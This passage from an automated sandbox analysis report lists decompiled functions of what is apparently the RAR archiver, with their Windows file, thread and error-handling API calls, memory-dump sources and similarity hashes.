                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 4141327611-0
                                                                                                            • Opcode ID: 242faf96b555db3d674a9b3044945aae816727f71031e8b7738d75d249c4be01
                                                                                                            • Instruction ID: b2e2f3da9f02078a13afc2f3fd53a7896467dc315d162f37d68acb7fb04fe86b
                                                                                                            • Opcode Fuzzy Hash: 242faf96b555db3d674a9b3044945aae816727f71031e8b7738d75d249c4be01
                                                                                                            • Instruction Fuzzy Hash: 01419421A0D74366FB618A5494C037962A0EF46BA0F5C4130DA9FB7BD6DF7EEA418740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B2CE8C Relevance: 6.1, APIs: 4, Instructions: 77fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 15%
                                                                                                            			E00007FF67FF650B2CE8C(void* __rax, long long __rbx, signed long long* __rcx, void* __rdx, long long __rbp, long long _a24, long long _a32, signed int _a40, char _a56, signed int _a4152, void* _a4168) {
				void* _t37;
				void* _t39;
				signed long long _t52;
				signed long long _t53;
				void* _t70;
				void* _t73;
				void* _t76;
				void* _t77;
				void* _t78;

				_a24 = __rbx;
				_a32 = __rbp;
				E00007FF67FF650B69CB0(0x1050, __rax, _t77, _t78);
				_t52 =  *0x50b978f0; // 0x27db226282f1
				_t53 = _t52 ^ _t73 - __rax;
				_a4152 = _t53;
				_a40 = _a40 & 0x00000000;
				_t70 = __rdx;
				_a32 = 0x3000000;
				_a24 = 3;
				r8d = 3;
				r9d = 0;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				 *__rcx = _t53;
				if (_t53 != 0xffffffff) goto 0x50b2cf32;
				r8d = 0x800;
				if (E00007FF67FF650B44664(_t53, __rcx, __rdx,  &_a56, _t76) == 0) goto 0x50b2cf32;
				_a40 = _a40 & 0x00000000;
				_a32 = 0x3000000;
				r9d = 0;
				r8d = 3;
				_a24 = 3;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				 *__rcx = _t53;
				if ( *__rcx != 0xffffffff) goto 0x50b2cfa9;
				_a40 = _a40 & 0x00000000;
				r9d = 0;
				_a32 = 0x2000000;
				r8d = 3;
				_a24 = 3;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				 *__rcx = _t53;
				if (_t53 != 0xffffffff) goto 0x50b2cfa9;
				r8d = 0x800;
				if (E00007FF67FF650B44664(_t53, __rcx, _t70,  &_a56, _t76) == 0) goto 0x50b2cfa9;
				_a40 = _a40 & 0x00000000;
				_a32 = 0x2000000;
				r9d = 0;
				r8d = 3;
				_a24 = 3;
				_t37 = CreateFileW(??, ??, ??, ??, ??, ??, ??);
				 *__rcx = _t53;
				__rcx[1] = __rcx[1] & 0x00000000;
				return E00007FF67FF650B69D10(_t37, _t39, _a4152 ^ _t73 - __rax);
			}












                                                                                                            0x7ff650b2ce8c
                                                                                                            0x7ff650b2ce91
                                                                                                            0x7ff650b2ce9c
                                                                                                            0x7ff650b2cea4
                                                                                                            0x7ff650b2ceab
                                                                                                            0x7ff650b2ceae
                                                                                                            0x7ff650b2ceb6
                                                                                                            0x7ff650b2cebc
                                                                                                            0x7ff650b2cec4
                                                                                                            0x7ff650b2cecf
                                                                                                            0x7ff650b2ced3
                                                                                                            0x7ff650b2ced9
                                                                                                            0x7ff650b2cee1
                                                                                                            0x7ff650b2cee7
                                                                                                            0x7ff650b2ceee
                                                                                                            0x7ff650b2cef0
                                                                                                            0x7ff650b2cf05
                                                                                                            0x7ff650b2cf07
                                                                                                            0x7ff650b2cf12
                                                                                                            0x7ff650b2cf1a
                                                                                                            0x7ff650b2cf1d
                                                                                                            0x7ff650b2cf20
                                                                                                            0x7ff650b2cf29
                                                                                                            0x7ff650b2cf2f
                                                                                                            0x7ff650b2cf36
                                                                                                            0x7ff650b2cf38
                                                                                                            0x7ff650b2cf3e
                                                                                                            0x7ff650b2cf41
                                                                                                            0x7ff650b2cf49
                                                                                                            0x7ff650b2cf51
                                                                                                            0x7ff650b2cf58
                                                                                                            0x7ff650b2cf5e
                                                                                                            0x7ff650b2cf65
                                                                                                            0x7ff650b2cf67
                                                                                                            0x7ff650b2cf7c
                                                                                                            0x7ff650b2cf7e
                                                                                                            0x7ff650b2cf89
                                                                                                            0x7ff650b2cf91
                                                                                                            0x7ff650b2cf94
                                                                                                            0x7ff650b2cf97
                                                                                                            0x7ff650b2cfa0
                                                                                                            0x7ff650b2cfa6
                                                                                                            0x7ff650b2cfa9
                                                                                                            0x7ff650b2cfd5

                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(?,00007FF650B186F6,?,?,?,00007FF650B1A520,000000FF,?,?,00000000,00000000,0000E980,?,00007FF650B12F6F), ref: 00007FF650B2CEE1
                                                                                                            • CreateFileW.KERNEL32(?,00007FF650B186F6,?,?,?,00007FF650B1A520,000000FF,?,?,00000000,00000000,0000E980,?,00007FF650B12F6F), ref: 00007FF650B2CF29
                                                                                                            • CreateFileW.KERNEL32(?,00007FF650B186F6,?,?,?,00007FF650B1A520,000000FF,?,?,00000000,00000000,0000E980,?,00007FF650B12F6F), ref: 00007FF650B2CF58
                                                                                                            • CreateFileW.KERNEL32(?,00007FF650B186F6,?,?,?,00007FF650B1A520,000000FF,?,?,00000000,00000000,0000E980,?,00007FF650B12F6F), ref: 00007FF650B2CFA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: fdc11d987334cf98b58ea734a93fabda1b9883c038a270ea210f60bd0d63eb15
                                                                                                            • Instruction ID: b7c9599363abcec417a4cc923aca6abccecebc82a73f0e978862f2f821617bb3
                                                                                                            • Opcode Fuzzy Hash: fdc11d987334cf98b58ea734a93fabda1b9883c038a270ea210f60bd0d63eb15
                                                                                                            • Instruction Fuzzy Hash: BA31C932618B4692E7608F11F5947AA77A1FB8A7E4F544325EEAD47BC8CF3DD1048B40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B31FF0 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 34%
                                                                                                            			E00007FF67FF650B31FF0(void* __esi, long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, intOrPtr _a8, long long _a16, long long _a24, long long _a32) {
				signed long long _v24;
				void* _t40;
				void* _t49;

				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t40 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x14)) != 1) goto 0x50b32022;
				GetStdHandle(??);
				 *((long long*)(__rcx + 8)) = __rax;
				_v24 = _v24 & 0x00000000;
				r8d = __esi;
				if (ReadFile(??, ??, ??, ??, ??) != 0) goto 0x50b3209f;
				if (E00007FF67FF650B32194(__rcx) == 0) goto 0x50b32065;
				r8d = 0x4e20;
				if (__r8 - __r8 <= 0) goto 0x50b32065;
				E00007FF67FF650B31FF0(__esi, __rax, __rcx, __rcx, __rdx, __r8, __rdx, __r8);
				goto 0x50b320a3;
				if ( *((intOrPtr*)(_t40 + 0x14)) != 1) goto 0x50b3207a;
				if (GetLastError() != 0x6d) goto 0x50b3207a;
				goto 0x50b320a3;
				if ( *((intOrPtr*)(_t40 + 0x14)) != 0) goto 0x50b3209a;
				if (__r8 - _t49 <= 0) goto 0x50b3209a;
				if (GetLastError() != 0x21) goto 0x50b3209a;
				r8d = 0x8000;
				goto 0x50b32058;
				goto 0x50b320a3;
				return _a8;
			}






                                                                                                            0x7ff650b31ff0
                                                                                                            0x7ff650b31ff5
                                                                                                            0x7ff650b31ffa
                                                                                                            0x7ff650b3200e
                                                                                                            0x7ff650b32011
                                                                                                            0x7ff650b32018
                                                                                                            0x7ff650b3201e
                                                                                                            0x7ff650b3202b
                                                                                                            0x7ff650b32031
                                                                                                            0x7ff650b3203f
                                                                                                            0x7ff650b3204b
                                                                                                            0x7ff650b3204d
                                                                                                            0x7ff650b32056
                                                                                                            0x7ff650b3205e
                                                                                                            0x7ff650b32063
                                                                                                            0x7ff650b32069
                                                                                                            0x7ff650b32074
                                                                                                            0x7ff650b32078
                                                                                                            0x7ff650b3207e
                                                                                                            0x7ff650b32088
                                                                                                            0x7ff650b32093
                                                                                                            0x7ff650b32095
                                                                                                            0x7ff650b32098
                                                                                                            0x7ff650b3209d
                                                                                                            0x7ff650b320b7

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$FileHandleRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2244327787-0
                                                                                                            • Opcode ID: 37b63480cbf2e3ec3ed79016db6e1b72a44835194e46e9e3228b257883cdbbb8
                                                                                                            • Instruction ID: 05c0b9c2eb216620c100e283d47bf076ce9879207d577bce34e33752d2eaa0df
                                                                                                            • Opcode Fuzzy Hash: 37b63480cbf2e3ec3ed79016db6e1b72a44835194e46e9e3228b257883cdbbb8
                                                                                                            • Instruction Fuzzy Hash: D8219231E0C643A3EE645B21A4803B97390EF4AB94F2C4530DA5FA6794CF2FE849C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5AE2C Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentPriorityThread$ClassProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1171435874-0
                                                                                                            • Opcode ID: 166ae1b1878abf8347d53c624a26b1f4a3b5e18e55b3408d1530bd05819dfb00
                                                                                                            • Instruction ID: dc3fc2ebfcad6ddf181834715a85e3059b053d3b3ce792e1c9f28b693aa21d18
                                                                                                            • Opcode Fuzzy Hash: 166ae1b1878abf8347d53c624a26b1f4a3b5e18e55b3408d1530bd05819dfb00
                                                                                                            • Instruction Fuzzy Hash: AF112AB5E18643A6E6A49710E4C523CB2A1AF46B94F384074C60BB7791EF3EF8464700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B75660 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E00007FF67FF650B75660(void* __rax, long long __rbx, void* __rcx, void* __r9, long long _a8) {
				void* _t4;
				void* _t9;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t23;
				void* _t29;
				void* _t32;
				void* _t33;

				_t27 = __rcx;
				_t25 = __rbx;
				_t23 = __rax;
				_a8 = __rbx;
				GetLastError();
				_t11 =  *0x50b97a5c; // 0x6
				if (_t11 == 0xffffffff) goto 0x50b7568a;
				_t4 = E00007FF67FF650B76D24(_t11, _t11 - 0xffffffff, __rax, __rbx, __rcx);
				if (__rax != 0) goto 0x50b756cb;
				E00007FF67FF650B77244(_t4, _t27, _t29);
				_t32 = _t23;
				if (_t23 != 0) goto 0x50b756aa;
				E00007FF67FF650B7495C(_t23, _t27);
				goto 0x50b756e6;
				_t14 =  *0x50b97a5c; // 0x6
				if (E00007FF67FF650B76D7C(_t14, _t23, _t23, _t25, _t27, _t23, _t33) == 0) goto 0x50b756a3;
				E00007FF67FF650B7540C(_t32, _t23);
				_t9 = E00007FF67FF650B7495C(_t23, _t32);
				if (_t32 == 0) goto 0x50b756e6;
				SetLastError(??);
				return _t9;
			}











                                                                                                            0x7ff650b75660
                                                                                                            0x7ff650b75660
                                                                                                            0x7ff650b75660
                                                                                                            0x7ff650b75660
                                                                                                            0x7ff650b7566a
                                                                                                            0x7ff650b75670
                                                                                                            0x7ff650b7567b
                                                                                                            0x7ff650b7567d
                                                                                                            0x7ff650b75688
                                                                                                            0x7ff650b75694
                                                                                                            0x7ff650b75699
                                                                                                            0x7ff650b7569f
                                                                                                            0x7ff650b756a3
                                                                                                            0x7ff650b756a8
                                                                                                            0x7ff650b756aa
                                                                                                            0x7ff650b756bd
                                                                                                            0x7ff650b756bf
                                                                                                            0x7ff650b756c6
                                                                                                            0x7ff650b756ce
                                                                                                            0x7ff650b756d2
                                                                                                            0x7ff650b756e5

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 1447195878-0
                                                                                                            • Opcode ID: 1614a43ddbf0cd9dcb866466ae97cd41a88e78f89b86facb4006df9109077415
                                                                                                            • Instruction ID: 0e463a5a9ea43926c48138d98239f3e17ea91f67cb804f18918dc226ba10c41b
                                                                                                            • Opcode Fuzzy Hash: 1614a43ddbf0cd9dcb866466ae97cd41a88e78f89b86facb4006df9109077415
                                                                                                            • Instruction Fuzzy Hash: 0A019E20B0D747AAFA686370A6D917C61915F4A790F1C0438ED1FA27D6EE2FF9454600
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5B190 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF650B5B518: ResetEvent.KERNEL32 ref: 00007FF650B5B531
                                                                                                              • Part of subcall function 00007FF650B5B518: ReleaseSemaphore.KERNEL32 ref: 00007FF650B5B547
                                                                                                            • ReleaseSemaphore.KERNEL32 ref: 00007FF650B5B1BC
                                                                                                            • CloseHandle.KERNEL32 ref: 00007FF650B5B1DB
                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 00007FF650B5B1F2
                                                                                                            • CloseHandle.KERNEL32 ref: 00007FF650B5B1FF
                                                                                                              • Part of subcall function 00007FF650B5B2A4: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF650B5B1A7,?,?,?,00007FF650B36532,?,?,?), ref: 00007FF650B5B2AB
                                                                                                              • Part of subcall function 00007FF650B5B2A4: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF650B5B1A7,?,?,?,00007FF650B36532,?,?,?), ref: 00007FF650B5B2B6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 502429940-0
                                                                                                            • Opcode ID: fa9c248e715331e3abaca40b4f92868a1c2b9b22f19131d558e63e082765f944
                                                                                                            • Instruction ID: 5b3f76db929dc75b16507e1a0ec37f1bede10881a1f5067288cfdc2a14b86511
                                                                                                            • Opcode Fuzzy Hash: fa9c248e715331e3abaca40b4f92868a1c2b9b22f19131d558e63e082765f944
                                                                                                            • Instruction Fuzzy Hash: BE012136A24E87A2E6889B21E5D466DB330FF8A780F044031DB5E63721CF7AE475C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B75D04 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00007FF67FF650B75D04(void* __ebx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t11;
				void* _t13;
				intOrPtr* _t21;
				intOrPtr* _t35;

				_t21 = _t35;
				 *((long long*)(_t21 + 8)) = __rbx;
				 *((long long*)(_t21 + 0x10)) = __rbp;
				 *((long long*)(_t21 + 0x18)) = __rsi;
				 *((long long*)(_t21 + 0x20)) = __rdi;
				r15b = r9b;
				_t10 =  >  ? __ebx : 0;
				_t11 = ( >  ? __ebx : 0) + 9;
				if (__rdx - _t21 > 0) goto 0x50b75d69;
				_t13 = E00007FF67FF650B74DAC(_t21);
				 *_t21 = 0x22;
				E00007FF67FF650B74C8C(_t13);
				return 0x22;
			}







                                                                                                            0x7ff650b75d04
                                                                                                            0x7ff650b75d07
                                                                                                            0x7ff650b75d0b
                                                                                                            0x7ff650b75d0f
                                                                                                            0x7ff650b75d13
                                                                                                            0x7ff650b75d25
                                                                                                            0x7ff650b75d2e
                                                                                                            0x7ff650b75d31
                                                                                                            0x7ff650b75d39
                                                                                                            0x7ff650b75d3b
                                                                                                            0x7ff650b75d45
                                                                                                            0x7ff650b75d47
                                                                                                            0x7ff650b75d68

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                            • String ID: e+000$gfff
                                                                                                            • API String ID: 3215553584-3030954782
                                                                                                            • Opcode ID: 13273187690b4168f1579979b723790ac9e50b4e2b11a9cf0fff74f517313c2c
                                                                                                            • Instruction ID: 084866dc0dcc182a5d8643b32534d12f4c3202d9eb9db1357445cf134d9a12fb
                                                                                                            • Opcode Fuzzy Hash: 13273187690b4168f1579979b723790ac9e50b4e2b11a9cf0fff74f517313c2c
                                                                                                            • Instruction Fuzzy Hash: 6B514862B187C356E7258F3598803A96B91EB82B90F0C8231CA9ED7BD5CF6EE545C701
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B44664 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E00007FF67FF650B44664(void* __rax, long long __rbx, short* __rcx, void* __rdx, void* __r8, long long _a32, signed int _a4088, void* _a4176) {
				intOrPtr _v4;
				char _v8;
				void* _t42;
				signed long long _t64;
				short* _t73;
				signed long long _t103;
				void* _t105;
				void* _t117;
				void* _t118;
				signed long long _t119;
				signed long long _t120;
				signed long long _t121;

				_a32 = __rbx;
				E00007FF67FF650B69CB0(0x1030, __rax, _t117, _t118);
				_t106 = _t105 - __rax;
				_t64 =  *0x50b978f0; // 0x27db226282f1
				_a4088 = _t64 ^ _t105 - __rax;
				r15d = 0;
				_t73 = __rcx;
				if ( *((intOrPtr*)(__rcx)) == r15w) goto 0x50b44827;
				E00007FF67FF650B44858(__rcx);
				_t120 = _t119 | 0xffffffff;
				_t103 = _t120 + 1;
				if ( *((intOrPtr*)(__rcx + _t103 * 2)) != r15w) goto 0x50b446b1;
				if (E00007FF67FF650B44888(_t42, __rcx) == 0) goto 0x50b44757;
				if (E00007FF67FF650B44858(__rcx) == 0) goto 0x50b4470b;
				_t5 = _t103 + 4; // 0x805
				if (__r8 - _t5 <= 0) goto 0x50b44827;
				E00007FF67FF650B5A390(__rdx, L"\\\\?\\", __r8);
				E00007FF67FF650B5A368(_t5, __rdx, __r8);
				goto 0x50b44829;
				if ( *_t73 != 0x5c) goto 0x50b44827;
				if ( *((short*)(_t73 + 2)) != 0x5c) goto 0x50b44827;
				_t7 = _t103 + 6; // 0x807
				if (__r8 - _t7 <= 0) goto 0x50b44827;
				E00007FF67FF650B5A390(__rdx, L"\\\\?\\", __r8);
				E00007FF67FF650B5A368(_t7, __rdx, __r8);
				goto 0x50b446f9;
				if (GetCurrentDirectoryW(??, ??) - 1 - 0x7fe > 0) goto 0x50b44827;
				if ( *_t73 == 0x5c) goto 0x50b447f1;
				if ( *_t73 == 0x2f) goto 0x50b447f1;
				E00007FF67FF650B43538(GetCurrentDirectoryW(??, ??) - 1,  &_v8,  &_v8, __r8);
				_t121 = _t120 + 1;
				if ( *((intOrPtr*)( &_v8 + _t121 * 2)) != r15w) goto 0x50b44794;
				_t14 = _t103 + 4; // 0x805
				if (__r8 - _t14 + _t121 <= 0) goto 0x50b44827;
				E00007FF67FF650B5A390(__rdx, L"\\\\?\\", __r8);
				E00007FF67FF650B5A368(_t14 + _t121, __rdx, __r8);
				if ( *_t73 != 0x2e) goto 0x50b446f6;
				if ( *((short*)(_t73 + 2)) == 0x5c) goto 0x50b447e8;
